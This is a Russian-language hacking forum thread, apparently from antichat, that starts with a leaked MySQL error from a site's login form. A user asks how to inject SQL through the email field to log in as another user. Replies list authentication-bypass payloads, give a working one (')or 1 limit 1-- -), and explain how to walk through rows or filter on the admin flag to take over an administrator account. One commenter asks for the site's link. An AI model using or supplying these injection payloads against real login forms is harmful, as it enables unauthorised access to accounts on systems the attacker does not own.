{"success":false,"message":"SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '098f6bcd4621d373cade4e832627b4f6', password_salt)) AND isbanned = 0 AND isdele' at line 1 (SQL: select `id`, `current_sign_in_at`, `current_sign_in_ip`, `isadmin_level1`, `isadmin`, `is_superadmin` from `users` where (email = 'RoXQ2bT562lTHlQ4Xm3FJg==' OR username = 'test'') AND BINARY encrypted_password = SHA1(CONCAT('098f6bcd4621d373cade4e832627b4f6', password_salt)) AND isbanned = 0 AND isdeleted = 0 limit 1)","alert":{"title":null,"description":null,"type":"error"}}

В пост запросе (авторизация юзера) в параметере email есть sql!Как составить запрос чтоб авторизоваться под юзером?

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

Не катит

Надеюсь это не взлом, а тестирование, тогда


Code:
')or 1 limit 1-- -

dooble said:
↑ (https://antichat.live/posts/4485419/)
Надеюсь это не взлом, а тестирование, тогда

Code:
')or 1 limit 1-- -



Здесь я так понимаю ID админа = 1

А как составить запрос если не знаешь id админа?

brown said:
↑ (https://antichat.live/posts/4494235/)
Здесь я так понимаю ID админа = 1


SQLmap не помогает ?

Bs_Ru said:
↑ (https://antichat.live/posts/4494238/)
SQLmap не помогает ?


двиг самопис,хэш не понятный

brown said:
↑ (https://antichat.live/posts/4494235/)
Здесь я так понимаю ID админа = 1
А как составить запрос если не знаешь id админа?


Нет, здесь условие составлено таким образом, что все записи попадут в выборку, а перебирать строки можно через limit 4,1 (например, пятая строка выборки).

Или дополнительно фильтровать по полю - признаку админа, если разобрался со структурой нужных таблиц.

brown said:
↑ (https://antichat.live/posts/4494235/)
Здесь я так понимаю ID админа = 1
А как составить запрос если не знаешь id админа?


ссылочку скинь посмотреть